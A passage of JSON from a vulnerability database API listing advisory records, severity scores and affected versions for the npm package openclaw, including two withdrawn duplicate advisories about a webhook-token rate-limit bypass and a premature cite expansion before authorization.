nerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35652","GHSA-8883-9w57-vwv6"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-r9j7-ya3h-cbda"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90036?format=json","vulnerability_id":"VCID-r9y1-z2ax-z3e2","summary":"Duplicate Advisory: OpenClaw: Synology Chat Webhook Pre-Auth Rate-Limit Bypass Enables Brute-Force Guessing of Webhook Token\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-mf5g-6r6f-ghhm. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.25 contains a pre-authentication rate-limit bypass vulnerability in webhook token validation that allows attackers to brute-force weak webhook secrets. The vulnerability exists because invalid webhook tokens are rejected without throttling repeated authentication attempts, enabling attackers to guess weak tokens through rapid successive requests.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/0b4d07337467f4d40a0cc1ced83d45ceaec0863c","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/0b4d07337467f4d40a0cc1ced83d45ceaec0863c"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mf5g-6r6f-ghhm","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mf5g-6r6f-ghhm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35646","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35646"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-pre-authentication-rate-limit-bypass-in-webhook-token-validation","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-pre-authentication-rate-limit-bypass-in-webhook-token-validation"},{"reference_url":"https://github.com/advisories/GHSA-59xc-5v89-r7pr","reference_id":"GHSA-59xc-5v89-r7pr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-59xc-5v89-r7pr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-59xc-5v89-r7pr"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-r9y1-z2ax-z3e2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89843?format=json","vulnerability_id":"VCID-rf6b-q7cj-jbgc","summary":"Duplicate Advisory: OpenClaw: Tlon cite expansion happens before channel and DM authorization is complete\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-vfg3-pqpq-93m4. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.22 performs cite expansion before completing channel and DM authorization checks, allowing cite work and content handling prior to final auth decisions. Attackers can exploit this timing vulnerability to access or manipulate content before proper authorization validation occurs.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ebee4e2210e1f282a982c7ef2ad79d77a572fc87","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/ebee4e2210e1f282a982c7ef2ad79d77a572fc87"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vfg3-pqpq-93m4","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vfg3-pqpq-93m4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35637","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35637"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-premature-cite-expansion-before-authorization-in-channel-and-dm","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-premature-cite-expansion-before-authorization-in-channel-and-dm"},{"reference_url":"https://github.com/advisories/GHSA-p6j4-wvmc-vx2h","reference_id":"GHSA-p6j4-wvmc-vx2h","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p6j4-wvmc-vx2h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{